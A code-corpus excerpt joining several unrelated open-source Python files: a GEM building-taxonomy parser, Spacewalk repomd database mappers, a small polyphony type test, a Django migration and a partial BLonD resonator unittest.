return self.__attrs
@property
def codes(self):
return self.__codes
def get_separator(self, separator_type):
if separator_type == GemTaxonomy.Separators.AttributeGroup:
return GemTaxonomyAttributeGroup.Separator
elif separator_type == GemTaxonomy.Separators.Attribute:
return GemTaxonomyAttribute.Separator
elif separator_type == GemTaxonomy.Separators.AttributeValue:
return GemTaxonomyAttributeValue.Separator
else:
raise TaxonomyError("Separator Type (%s) not supported" % separator_type)
def get_attribute_group_by_name(self, name):
for grp in self.__attrGroups:
if grp.name == name:
return grp
return None
def get_attribute_by_name(self, name):
for attr in self.__attrs:
if attr.name == name:
return attr
return None
def get_code_by_name(self, name):
if self.__codes.has_key(name):
return self.__codes[name]
return None
def get_code_by_attribute(self, attribute_name, parent_code=None):
has_rule = False
if isinstance(parent_code, TaxonomyAttributeCode):
parent_lookup = parent_code.attribute.lookup_table
child_lookup = self.get_attribute_by_name(attribute_name).lookup_table
rule_key = '%s|%s' % (parent_lookup, child_lookup)
has_rule = self.rules.has_key(rule_key)
if has_rule:
rule = self.rules[rule_key]
if not rule.has_key(parent_code):
return
for code in rule[parent_code]:
yield code
else:
for code in self.__codes.values():
if code.attribute.name == attribute_name:
yield code
def has_rule(self, attribute):
if type(attribute) == str:
attribute = self.get_attribute_by_name(attribute)
for keys in self.rules.keys():
if keys.find(attribute.lookup_table) >= 0:
return True
return False
@logAPICall
def parse(self, taxonomy_str):
str_attrs = str(taxonomy_str).split('/')
if len(str_attrs)== 0:
raise TaxonomyParseError("Incorrect format")
attributes = []
for attr in str_attrs:
# determine type
if re.match('\w+(\+\w+)+', attr):
# multiple codes, split and search each
levels = attr.split('+')
for lvl in levels:
if not self.__codes.has_key(lvl):
raise TaxonomyParseError('%s is not a valid taxonomy code' %(lvl))
code = self.__codes[lvl]
codeValue = GemTaxonomyAttributeSinglecodeValue(code.attribute)
codeValue.add_value(code)
attributes.append(codeValue)
elif re.match('\w+\:\d*', attr):
# code:value format
(type_id, val) = attr.split(':')
if not self.__codes.has_key(type_id):
raise TaxonomyParseError('%s is not a valid taxonomy code' %(type_id))
code = self.__codes[type_id]
codeValue = GemTaxonomyAttributePairValue(code.attribute)
codeValue.add_value(code, val)
attributes.append(codeValue)
elif re.match('\w+', attr):
# code only, search code table
if not self.__codes.has_key(attr):
raise TaxonomyParseError('%s is not a valid taxonomy code' %(attr))
code = self.__codes[attr]
codeValue = GemTaxonomyAttributeSinglecodeValue(code.attribute)
codeValue.add_value(code)
attributes.append(codeValue)
return attributes
def is_valid_string(self, tax_string):
return True
@logAPICall
def to_string2(self, taxonomy_values, order_attributes=False, fill_missing=False):
""" serialize a set of taxonomy values into GEM specific taxonomy string """
vals = self.parse("/".join([str(n) for n in taxonomy_values]))
if (fill_missing):
to_add = [g.name for g in self.attribute_groups]
for v in vals:
try:
to_add.remove(v.code.attribute.group.name)
except:
pass
str_add = []
for name in to_add:
str_add.append(self.get_attribute_group_by_name(name).default)
vals = vals + self.parse("/".join(str_add))
order_attributes=True
if (order_attributes):
vals.sort(key=attrgetter('code.attribute.group.order'))
out_str = []
for idx, v in enumerate(vals):
if idx > 0:
if v.code.attribute.group.order == vals[idx-1].code.attribute.group.order:
out_str.append(GemTaxonomyAttribute.Separator)
else:
out_str.append(GemTaxonomyAttributeGroup.Separator)
out_str.append(str(v))
return "".join(out_str)
@logAPICall
def to_string(self, taxonomy_values, order_attributes=False, fill_missing=False):
""" serialize a set of taxonomy values into GEM specific taxonomy string """
vals = self.parse("/".join([str(n) for n in taxonomy_values]))
if not order_attributes:
out_str = []
for idx, v in enumerate(vals):
if idx > 0:
if v.code.attribute.group.order == vals[idx-1].code.attribute.group.order:
out_str.append(GemTaxonomyAttribute.Separator)
else:
out_str.append(GemTaxonomyAttributeGroup.Separator)
out_str.append(str(v))
return "".join(out_str)
else:
out_str = ['']*len(self._output_str)
# set directions
out_str[0], out_str[3] = 'DX','DY'
vals.sort(key=lambda val:val.code.attribute.group.order*100+val.code.attribute.order)
for v in vals:
g_name = v.attribute.group.name
idxlist = [i for i,val in enumerate(self._output_str) if val==g_name]
for idx in idxlist:
if out_str[idx] == '':
out_str[idx] = str(v)
else:
out_str[idx] = "%s+%s" % (out_str[idx], str(v))
return "/".join(out_str)
def __initialize(self, db_path):
"""
prepare parser
- load attributes and codes from underlying db
"""
if self.__initialized:
return
logAPICall.log('initialize taxonomy from database %s' % db_path, logAPICall.DEBUG)
# load attributes / code from DB for parsing
conn = sqlite3.connect(db_path)
c = conn.cursor()
# load attribute groups
# attribute group default value for fill-in to missing groups
sql = """
select a.attribute, a.default_value from dic_gem_attributes g inner join dic_gem_attribute_levels a on g.attribute=a.attribute where level=1 and order_in_basic <> ''
"""
c.execute(sql)
default_values = {}
for row in c:
default_values[str(row[0])]=str(row[1])
sql = """
select order_in_extended, attribute from dic_gem_attributes g order by order_in_extended asc
"""
c.execute(sql)
output_str = []
for row in c:
output_str.append(str(row[1]))
self._output_str = output_str[:3]+output_str
sql = """
select g.order_in_basic, g.attribute, max(a.level) levels, g.format
from dic_gem_attributes g
inner join dic_gem_attribute_levels a on g.attribute=a.attribute
where order_in_basic <> ''
group by g.order_in_basic, g.attribute, g.format
order by order_in_basic
"""
c.execute(sql)
self.__attrGroups = []
for row in c:
grp = GemTaxonomyAttributeGroup(str(row[1]).strip(), int(row[0]), int(row[2]),
default_values[str(row[1])], int(row[3]))
self.__attrGroups.append(grp)
# load attributes
sql = """
select a.name, a.level, g.attribute, a.format, a.lookup_table
from dic_gem_attributes g
inner join dic_gem_attribute_levels a on g.attribute=a.attribute
where order_in_basic <> ''
group by a.name, a.level, g.attribute, a.lookup_table, a.format
order by g.order_in_basic, a.level
"""
c.execute(sql)
self.__attrs = []
for row in c:
grp = self.get_attribute_group_by_name(str(row[2]).strip())
attr = GemTaxonomyAttribute(str(row[0]).strip(), grp,
int(row[1]), None, int(row[3]))
attr.lookup_table = str(row[4])
grp.add_attribute(attr)
self.__attrs.append(attr)
# load codes
sql = """select code, description, scope from %s"""
self.__codes = {}
for attr in self.__attrs:
if attr.lookup_table == "":
continue
c.execute(sql % attr.lookup_table)
for row in c:
code_value = str(row[0]).strip()
code = TaxonomyAttributeCode(attr,
code_value, str(row[1]).strip(), str(row[2]).strip())
self.__codes[code_value] = code
attr.add_code(code)
# load rules
sql = """ select parent_table, child_table, parent_code, child_code from GEM_RULES """
c.execute(sql)
self.rules = {}
for row in c:
rule_key = '%s|%s' % (str(row[0]).strip(), str(row[1]).strip())
parent_code = self.__codes[str(row[2]).strip()]
child_code = self.__codes[str(row[3]).strip()]
if not self.rules.has_key(rule_key):
self.rules[rule_key] = {}
rule = self.rules[rule_key]
if not rule.has_key(parent_code):
rule[parent_code] = []
rule[parent_code].append(child_code)
conn.close()
self.__initialized=True
class GemTaxonomyAttribute(TaxonomyAttribute):
"""
Gem taxonomy attribute. used to create range strings and validate strings
"""
(EXACT, RANGE, APP, PRE) = range(4)
Separator = "+"
def __init__(self, name="", attribute_group=None, order=1, default="", attribute_type=1, codes=None):
super(GemTaxonomyAttribute, self).__init__(name, attribute_group, order, default, attribute_type, codes)
def make_string(self, values, qualifier=None):
if self.type == 1:
return '+'.join([str(v) for v in values])
else:
if qualifier is None:
if (values[0] is not None and values[1] is not None):
qualifier=GemTaxonomyAttribute.RANGE
else:
qualifier=GemTaxonomyAttribute.EXACT
if self.name == "Height":
# construct valid height string from given values
if (values[0] is None or values[1] is None) or (values[0] == 0 and values[1] == 0):
return "H99"
elif qualifier==GemTaxonomyAttribute.EXACT:
return "HEX:%s" % ( values[0] )
elif qualifier==GemTaxonomyAttribute.RANGE:
return "HBET:%s,%s" % (values[0], values[1])
else:
return "H99"
elif self.name == "Date of Construction":
# construct valid date of construction string from given values
if (values[0] is None or values[1] is None) or (values[0] == 0 and values[1] == 0):
return "Y99"
elif qualifier==GemTaxonomyAttribute.PRE:
return "YPRE:%s" % ( values[0] )
elif qualifier==GemTaxonomyAttribute.APP:
return "YAPP:%s" % ( values[0] )
elif qualifier==GemTaxonomyAttribute.RANGE:
return "YBET:%s,%s" % (values[0], values[1])
else:
return "Y99"
class GemTaxonomyAttributeGroup(TaxonomyAttributeGroup):
"""
Gem taxonomy multicode value used for
- height
- yearbuilt
"""
Separator = "/"
def __init__(self, name="", order=1, levels=1, default="", attribute_type=1, attributes=None):
super(GemTaxonomyAttributeGroup, self).__init__(name, order, levels, default, attribute_type, attributes)
def make_string(self, values, qualifier=None):
raise NotImplementedError("abstract method not implemented")
class GemTaxonomyAttributeValue(TaxonomyAttributeValue):
"""
This is an abstract class that can be derived to stores valid value
for a taxonomy attribute
"""
Separator = ":"
def __init__(self, attribute):
""" constructor """
super(GemTaxonomyAttributeValue, self).__init__(attribute)
class GemTaxonomyAttributeMulticodeValue(TaxonomyAttributeMulticodeValue):
"""
Gem taxonomy multicode value used for
- height
- yearbuilt
"""
def __init__(self, attribute):
TaxonomyAttributeMulticodeValue.__init__(self, attribute)
def __str__(self):
""" string representation """
outstr=""
total = len(self.codes)
if total == 0:
return outstr
# first code is primary
outstr = self.codes[0]
for i in range(1, total):
outstr += '+%s' % (self.codes[i].code)
#outstr += "/"
return outstr
class GemTaxonomyAttributeSinglecodeValue(TaxonomyAttributeSinglecodeValue):
"""
Gem taxonomy single code value used for
-
"""
def __init__(self, attribute):
""" constructor """
TaxonomyAttributeSinglecodeValue.__init__(self, attribute)
def __str__(self):
""" string representation """
if self.code is not None:
return self.code.code
else:
return ""
class GemTaxonomyAttributePairValue(TaxonomyAttributePairValue):
"""
Gem taxonomy single code value used for
-
"""
def __init__(self, attribute):
""" constructor """
TaxonomyAttributePairValue.__init__(self, attribute)
def __str__(self):
""" string representation """
if self.code is not None:
if self.value is not None and self.value != "":
return self.code.code + ":" + self.value
else:
return self.code.code
else:
return "" | gem/sidd | sidd/taxonomy/gem/taxonomy.py | Python | agpl-3.0 | 17,545 |
#
# Copyright (c) 2008--2013 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Classes for mapping domain objects to the rhn db.
#
import os.path
import re
import time
from spacewalk.common import rhnCache
from spacewalk.common.rhnConfig import CFG
from spacewalk.server import rhnSQL
import domain
CACHE_PREFIX = "/var/cache/rhn/"
class ChannelMapper:
""" Data Mapper for Channels to the RHN db. """
def __init__(self, pkg_mapper, erratum_mapper, comps_mapper):
self.pkg_mapper = pkg_mapper
self.erratum_mapper = erratum_mapper
self.comps_mapper = comps_mapper
self.channel_details_sql = rhnSQL.prepare("""
select
c.label,
c.name,
ct.label checksum_type
from
rhnChannel c,
rhnChecksumType ct
where c.id = :channel_id
and c.checksum_type_id = ct.id
""")
self.channel_sql = rhnSQL.prepare("""
select
package_id
from
rhnChannelPackage
where
channel_id = :channel_id
""")
self.last_modified_sql = rhnSQL.prepare("""
select
to_char(last_modified, 'YYYYMMDDHH24MISS') as last_modified
from
rhnChannel
where id = :channel_id
""")
self.errata_id_sql = rhnSQL.prepare("""
select
e.id
from
rhnChannelErrata ce,
rhnErrata e
where
ce.channel_id = :channel_id
and e.id = ce.errata_id
""")
self.comps_id_sql = rhnSQL.prepare("""
select
id
from
rhnChannelComps
where
channel_id = :channel_id
order by id desc
""")
self.cloned_from_id_sql = rhnSQL.prepare("""
select
original_id id
from
rhnChannelCloned
where
id = :channel_id
""")
def last_modified(self, channel_id):
""" Get the last_modified field for the provided channel_id. """
self.last_modified_sql.execute(channel_id = channel_id)
return self.last_modified_sql.fetchone()[0]
def get_channel(self, channel_id):
""" Load the channel with id channel_id and its packages. """
self.channel_details_sql.execute(channel_id = channel_id)
details = self.channel_details_sql.fetchone()
channel = domain.Channel(channel_id)
channel.label = details[0]
channel.name = details[1]
channel.checksum_type = details[2]
self.channel_sql.execute(channel_id = channel_id)
package_ids = self.channel_sql.fetchall()
channel.num_packages = len(package_ids)
channel.packages = self._package_generator(package_ids)
channel.errata = self._erratum_generator(channel_id)
self.comps_id_sql.execute(channel_id = channel_id)
comps_id = self.comps_id_sql.fetchone()
if comps_id:
channel.comps = self.comps_mapper.get_comps(comps_id[0])
self.cloned_from_id_sql.execute(channel_id = channel_id)
cloned_row = self.cloned_from_id_sql.fetchone()
if cloned_row is not None:
channel.cloned_from_id = cloned_row[0]
else:
channel.cloned_from_id = None
return channel
def _package_generator(self, package_ids):
for package_id in package_ids:
pkg = self.pkg_mapper.get_package(package_id[0])
yield pkg
def _erratum_generator(self, channel_id):
self.errata_id_sql.execute(channel_id = channel_id)
erratum_ids = self.errata_id_sql.fetchall()
for erratum_id in erratum_ids:
erratum = self.erratum_mapper.get_erratum(erratum_id[0])
yield erratum
class CachedPackageMapper:
""" Data Mapper for Packages to an on-disc cache. """
def __init__(self, mapper):
cache = rhnCache.Cache()
# For more speed, we won't compress.
# cache = rhnCache.CompressedCache(cache)
cache = rhnCache.ObjectCache(cache)
self.cache = rhnCache.NullCache(cache)
self.mapper = mapper
def get_package(self, package_id):
"""
Load the package with id package_id.
Load from the cache, if it is new enough. If not, fall back to the
provided mapper.
"""
package_id = str(package_id)
last_modified = str(self.mapper.last_modified(package_id))
last_modified = last_modified.replace(" ", "")
last_modified = last_modified.replace(":", "")
last_modified = last_modified.replace("-", "")
cache_key = "repomd-packages/" + package_id
if self.cache.has_key(cache_key, last_modified):
package = self.cache.get(cache_key)
else:
package = self.mapper.get_package(package_id)
self.cache.set(cache_key, package, last_modified)
return package
class SqlPackageMapper:
""" Data Mapper for Packages to the RHN db. """
def __init__(self):
self.details_sql = rhnSQL.prepare("""
select
pn.name,
pevr.version,
pevr.release,
pevr.epoch,
pa.label arch,
c.checksum checksum,
p.summary,
p.description,
p.vendor,
p.build_time,
p.package_size,
p.payload_size,
p.installed_size,
p.header_start,
p.header_end,
pg.name package_group,
p.build_host,
p.copyright,
p.path,
sr.name source_rpm,
p.last_modified,
c.checksum_type
from
rhnPackage p,
rhnPackageName pn,
rhnPackageEVR pevr,
rhnPackageArch pa,
rhnPackageGroup pg,
rhnSourceRPM sr,
rhnChecksumView c
where
p.id = :package_id
and p.name_id = pn.id
and p.evr_id = pevr.id
and p.package_arch_id = pa.id
and p.package_group = pg.id
and p.source_rpm_id = sr.id
and p.checksum_id = c.id
""")
self.filelist_sql = rhnSQL.prepare("""
select
pc.name
from
rhnPackageCapability pc,
rhnPackageFile pf
where
pf.package_id = :package_id
and pf.capability_id = pc.id
""")
self.prco_sql = rhnSQL.prepare("""
select
'provides',
pp.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageProvides pp
where
pp.package_id = :package_id
and pp.capability_id = pc.id
union all
select
'requires',
pr.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageRequires pr
where
pr.package_id = :package_id
and pr.capability_id = pc.id
union all
select
'recommends',
prec.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageRecommends prec
where
prec.package_id = :package_id
and prec.capability_id = pc.id
union all
select
'supplements',
supp.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageSupplements supp
where
supp.package_id = :package_id
and supp.capability_id = pc.id
union all
select
'enhances',
enh.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageEnhances enh
where
enh.package_id = :package_id
and enh.capability_id = pc.id
union all
select
'suggests',
sugg.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageSuggests sugg
where
sugg.package_id = :package_id
and sugg.capability_id = pc.id
union all
select
'conflicts',
pcon.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageConflicts pcon
where
pcon.package_id = :package_id
and pcon.capability_id = pc.id
union all
select
'obsoletes',
po.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageObsoletes po
where
po.package_id = :package_id
and po.capability_id = pc.id
union all
select
'breaks',
brks.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackageBreaks brks
where
brks.package_id = :package_id
and brks.capability_id = pc.id
union all
select
'predepends',
pdep.sense,
pc.name,
pc.version
from
rhnPackageCapability pc,
rhnPackagePredepends pdep
where
pdep.package_id = :package_id
and pdep.capability_id = pc.id
""")
self.last_modified_sql = rhnSQL.prepare("""
select
to_char(last_modified, 'YYYYMMDDHH24MISS') as last_modified
from
rhnPackage
where id = :package_id
""")
self.other_sql = rhnSQL.prepare("""
select
name,
text,
time
from
rhnPackageChangelog
where package_id = :package_id
""")
def last_modified(self, package_id):
""" Get the last_modified date on the package with id package_id. """
self.last_modified_sql.execute(package_id = package_id)
return self.last_modified_sql.fetchone()[0]
def get_package(self, package_id):
""" Get the package with id package_id from the RHN db. """
package = domain.Package(package_id)
self._fill_package_details(package)
self._fill_package_prco(package)
self._fill_package_filelist(package)
self._fill_package_other(package)
return package
def _get_package_filename(self, pkg):
if pkg[18]:
path = pkg[18]
return os.path.basename(path)
else:
name = pkg[0]
version = pkg[1]
release = pkg[2]
arch = pkg[4]
return "%s-%s-%s.%s.rpm" % (name, version, release, arch)
def _fill_package_details(self, package):
""" Load the packages basic details (summary, description, etc). """
self.details_sql.execute(package_id = package.id)
pkg = self.details_sql.fetchone()
package.name = pkg[0]
package.version = pkg[1]
package.release = pkg[2]
if pkg[3] != None:
package.epoch = pkg[3]
package.arch = pkg[4]
package.checksum_type = pkg[21]
package.checksum = pkg[5]
package.summary = string_to_unicode(pkg[6])
package.description = string_to_unicode(pkg[7])
package.vendor = string_to_unicode(pkg[8])
package.build_time = oratimestamp_to_sinceepoch(pkg[9])
package.package_size = pkg[10]
package.payload_size = pkg[11]
package.installed_size = pkg[12]
package.header_start = pkg[13]
package.header_end = pkg[14]
package.package_group = pkg[15]
package.build_host = pkg[16]
package.copyright = string_to_unicode(pkg[17])
package.filename = self._get_package_filename(pkg)
package.source_rpm = pkg[19]
def _fill_package_prco(self, package):
""" Load the package's provides, requires, conflicts, obsoletes. """
self.prco_sql.execute(package_id = package.id)
deps = self.prco_sql.fetchall() or []
for item in deps:
version = item[3] or ""
relation = ""
release = None
epoch = 0
if version:
sense = item[1] or 0
relation = SqlPackageMapper.__get_relation(sense)
vertup = version.split('-')
if len(vertup) > 1:
version = vertup[0]
release = vertup[1]
vertup = version.split(':')
if len(vertup) > 1:
epoch = vertup[0]
version = vertup[1]
dep = {'name' : string_to_unicode(item[2]), 'flag' : relation,
'version' : version, 'release' : release, 'epoch' : epoch}
if item[0] == "provides":
package.provides.append(dep)
elif item[0] == "requires":
package.requires.append(dep)
elif item[0] == "conflicts":
package.conflicts.append(dep)
elif item[0] == "obsoletes":
package.obsoletes.append(dep)
elif item[0] == "recommends":
package.recommends.append(dep)
elif item[0] == "supplements":
package.supplements.append(dep)
elif item[0] == "enhances":
package.enhances.append(dep)
elif item[0] == "suggests":
package.suggests.append(dep)
elif item[0] == "breaks":
package.breaks.append(dep)
elif item[0] == "predepends":
package.predepends.append(dep)
else:
assert False, "Unknown PRCO type: %s" % item[0]
# @staticmethod
def __get_relation(sense):
""" Convert the binary sense into a string. """
# Flip the bits for easy comparison
sense = sense & 0xf
if sense == 2:
relation = "LT"
elif sense == 4:
relation = "GT"
elif sense == 8:
relation = "EQ"
elif sense == 10:
relation = "LE"
elif sense == 12:
relation = "GE"
else:
assert False, "Unknown relation sense: %s" % sense
return relation
__get_relation = staticmethod(__get_relation)
def _fill_package_filelist(self, package):
""" Load the package's list of files. """
self.filelist_sql.execute(package_id = package.id)
files = self.filelist_sql.fetchall() or []
for file_dict in files:
package.files.append(string_to_unicode(file_dict[0]))
def _fill_package_other(self, package):
""" Load the package's changelog info. """
self.other_sql.execute(package_id = package.id)
log_data = self.other_sql.fetchall() or []
for data in log_data:
date = oratimestamp_to_sinceepoch(data[2])
chglog = {'author' : string_to_unicode(data[0]), 'date' : date,
'text' : string_to_unicode(data[1])}
package.changelog.append(chglog)
class CachedErratumMapper:
""" Data Mapper for Errata to an on-disc cache. """
def __init__(self, mapper, package_mapper):
self.package_mapper = package_mapper
cache = rhnCache.Cache()
cache = rhnCache.ObjectCache(cache)
self.cache = rhnCache.NullCache(cache)
self.mapper = mapper
def get_erratum(self, erratum_id):
"""
Load the erratum with id erratum_id.
Load from the cache, if it is new enough. If not, fall back to the
provided mapper.
"""
erratum_id = str(erratum_id)
last_modified = str(self.mapper.last_modified(erratum_id))
last_modified = re.sub(" ", "", last_modified)
last_modified = re.sub(":", "", last_modified)
last_modified = re.sub("-", "", last_modified)
cache_key = "repomd-errata/" + erratum_id
if self.cache.has_key(cache_key, last_modified):
erratum = self.cache.get(cache_key)
for package_id in erratum.package_ids:
package = self.package_mapper.get_package(package_id)
erratum.packages.append(package)
else:
erratum = self.mapper.get_erratum(erratum_id)
tmp_packages = erratum.packages
erratum.packages = []
self.cache.set(cache_key, erratum, last_modified)
erratum.packages = tmp_packages
return erratum
class SqlErratumMapper:
def __init__(self, package_mapper):
self.package_mapper = package_mapper
self.last_modified_sql = rhnSQL.prepare("""
select
to_char(last_modified, 'YYYYMMDDHH24MISS') as last_modified
from
rhnErrata
where id = :erratum_id
""")
self.erratum_details_sql = rhnSQL.prepare("""
select
advisory,
advisory_name,
advisory_type,
advisory_rel,
description,
synopsis,
TO_CHAR(issue_date, 'YYYY-MM-DD HH24:MI:SS') AS issue_date,
TO_CHAR(update_date, 'YYYY-MM-DD HH24:MI:SS') AS update_date
from
rhnErrata
where
id = :erratum_id
""")
self.erratum_cves_sql = rhnSQL.prepare("""
select
cve.name as cve_name
from
rhnCVE cve,
rhnErrataCVE ec
where
ec.errata_id = :erratum_id
and ec.cve_id = cve.id
""")
self.erratum_bzs_sql = rhnSQL.prepare("""
select
bug_id,
summary,
href
from
rhnErrataBuglist
where
errata_id = :erratum_id
""")
self.erratum_packages_sql = rhnSQL.prepare("""
select
package_id
from
rhnErrataPackage
where
errata_id = :erratum_id
""")
def last_modified(self, erratum_id):
""" Get the last_modified field for the provided erratum_id. """
self.last_modified_sql.execute(erratum_id = erratum_id)
return self.last_modified_sql.fetchone()[0]
def get_erratum(self, erratum_id):
""" Get the package with id package_id from the RHN db. """
erratum = domain.Erratum(erratum_id)
self._fill_erratum_details(erratum)
# TODO: These two don't work on satellites.
# We must not install the tables there
self._fill_erratum_bz_references(erratum)
self._fill_erratum_cve_references(erratum)
self._fill_erratum_packages(erratum)
return erratum
def _fill_erratum_details(self, erratum):
self.erratum_details_sql.execute(erratum_id = erratum.id)
ertm = self.erratum_details_sql.fetchone()
erratum.readable_id = ertm[0]
erratum.title = ertm[1]
if ertm[2] == 'Security Advisory':
erratum.advisory_type = 'security'
elif ertm[2] == 'Bug Fix Advisory':
erratum.advisory_type = 'bugfix'
elif ertm[2] == 'Product Enhancement Advisory':
erratum.advisory_type = 'enhancement'
else:
erratum.advisory_type = 'errata'
erratum.version = ertm[3]
erratum.description = ertm[4]
erratum.synopsis = ertm[5]
erratum.issued = ertm[6]
erratum.updated = ertm[7]
def _fill_erratum_bz_references(self, erratum):
self.erratum_bzs_sql.execute(erratum_id = erratum.id)
bz_refs = self.erratum_bzs_sql.fetchall_dict()
if bz_refs:
erratum.bz_references = bz_refs
def _fill_erratum_cve_references(self, erratum):
self.erratum_cves_sql.execute(erratum_id = erratum.id)
cve_refs = self.erratum_cves_sql.fetchall()
for cve_ref in cve_refs:
erratum.cve_references.append(cve_ref[0])
def _fill_erratum_packages(self, erratum):
self.erratum_packages_sql.execute(erratum_id = erratum.id)
pkgs = self.erratum_packages_sql.fetchall()
for pkg in pkgs:
package = self.package_mapper.get_package(pkg[0])
erratum.packages.append(package)
erratum.package_ids.append(pkg[0])
class SqlCompsMapper:
def __init__(self):
self.comps_sql = rhnSQL.prepare("""
select
relative_filename
from
rhnChannelComps
where
id = :comps_id
""")
def get_comps(self, comps_id):
self.comps_sql.execute(comps_id = comps_id)
comps_row = self.comps_sql.fetchone()
filename = os.path.join(CFG.mount_point, comps_row[0])
return domain.Comps(comps_id, filename)
def get_channel_mapper():
""" Factory Method-ish function to load a Channel Mapper. """
package_mapper = get_package_mapper()
erratum_mapper = get_erratum_mapper(package_mapper)
comps_mapper = SqlCompsMapper()
channel_mapper = ChannelMapper(package_mapper, erratum_mapper, comps_mapper)
return channel_mapper
def get_package_mapper():
""" Factory Method-ish function to load a Package Mapper. """
package_mapper = SqlPackageMapper()
package_mapper = CachedPackageMapper(package_mapper)
return package_mapper
def get_erratum_mapper(package_mapper):
""" Factory Method-ish function to load an Erratum Mapper. """
erratum_mapper = SqlErratumMapper(package_mapper)
erratum_mapper = CachedErratumMapper(erratum_mapper, package_mapper)
return erratum_mapper
def oratimestamp_to_sinceepoch(ts):
return time.mktime((ts.year, ts.month, ts.day, ts.hour, ts.minute,
ts.second, 0, 0, -1))
def string_to_unicode(text):
if text is None:
return ''
if isinstance(text, unicode):
return text
#First try a bunch of encodings in strict mode
encodings = ['ascii', 'iso-8859-1', 'iso-8859-15', 'iso-8859-2']
for encoding in encodings:
try:
dec = text.decode(encoding)
enc = dec.encode('utf-8')
return enc
except UnicodeError:
continue
# None of those worked, just do ascii with replace
dec = text.decode(encoding, 'replace')
enc = dec.encode('utf-8', 'replace')
return enc
| moio/spacewalk | backend/server/repomd/mapper.py | Python | gpl-2.0 | 23,045 |
from polyphony import testbench
def f(a):
return a
def int_f(a):
b = 3
c = f(b)
if c == 3:
return a
else:
return b
def bool_f(a):
b = (3 == 4)
c = f(b)
if c :
return a
else:
return a + 3
def ib_f(a):
if a == 1:
return int_f(a)
else:
return bool_f(a)
@testbench
def test():
#r = int_f(3) #ok
#r = bool_f(1) #ok
r = ib_f(1)
print(r)
test()
| ryos36/polyphony-tutorial | malicious/type_test.py | Python | mit | 452 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-05-08 21:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0002_auto_20160508_1908'),
]
operations = [
migrations.AlterField(
model_name='post',
name='featured_photo',
field=models.ImageField(upload_to='/products'),
),
]
| porimol/django-blog | cms/migrations/0003_auto_20160508_2115.py | Python | mit | 461 |
# coding: utf8
# Copyright 2014-2017 CERN. This software is distributed under the
# terms of the GNU General Public Licence version 3 (GPL Version 3),
# copied verbatim in the file LICENCE.md.
# In applying this licence, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization or
# submit itself to any jurisdiction.
# Project website: http://blond.web.cern.ch/
"""
Unittest for utils.bmath
:Authors: **Konstantinos Iliakis**
"""
import unittest
import numpy as np
# import inspect
from blond.utils import bmath as bm
class TestFastResonator(unittest.TestCase):
# Run before every test
def setUp(self):
np.random.seed(0)
pass
# Run after every test
def tearDown(self):
pass
def test_fast_resonator_py_V_C_1(self):
n_resonators = 5
size = 10
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_C_2(self):
n_resonators = 5
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_C_3(self):
n_resonators = 20
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for i in range(0, n_resonators):
impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
(freq_a[1:] / freq_R[i] -
freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py2_V_C_4(self):
n_resonators = 20
size = 1000
decimal = 14
freq_a = np.random.randn(size)
R_S = np.random.randn(n_resonators)
Q = np.random.randn(n_resonators)
freq_R = np.random.randn(n_resonators)
impedance_py = np.zeros(len(freq_a), complex)
for res in range(0, n_resonators):
Qsquare = Q[res] * Q[res]
for freq in range(1, len(freq_a)):
commonTerm = (freq_a[freq] / freq_R[res]
- freq_R[res]/freq_a[freq])
impedance_py.real[freq] += R_S[res] \
/ (1. + Qsquare * commonTerm * commonTerm)
impedance_py.imag[freq] -= R_S[res] * (Q[res] * commonTerm) \
/ (1. + Qsquare * commonTerm * commonTerm)
# impedance_py[1:] += R_S[i] / (1 + 1j * Q[i] *
# (freq_a[1:] / freq_R[i] -
# freq_R[i] / freq_a[1:]))
impedance_c = bm.fast_resonator(R_S, Q, freq_a, freq_R)
np.testing.assert_almost_equal(
impedance_py, impedance_c, decimal=decimal)
def test_fast_resonator_py_V_C_5(self):
n_resonators = 100
size = 100000
decimal = 14
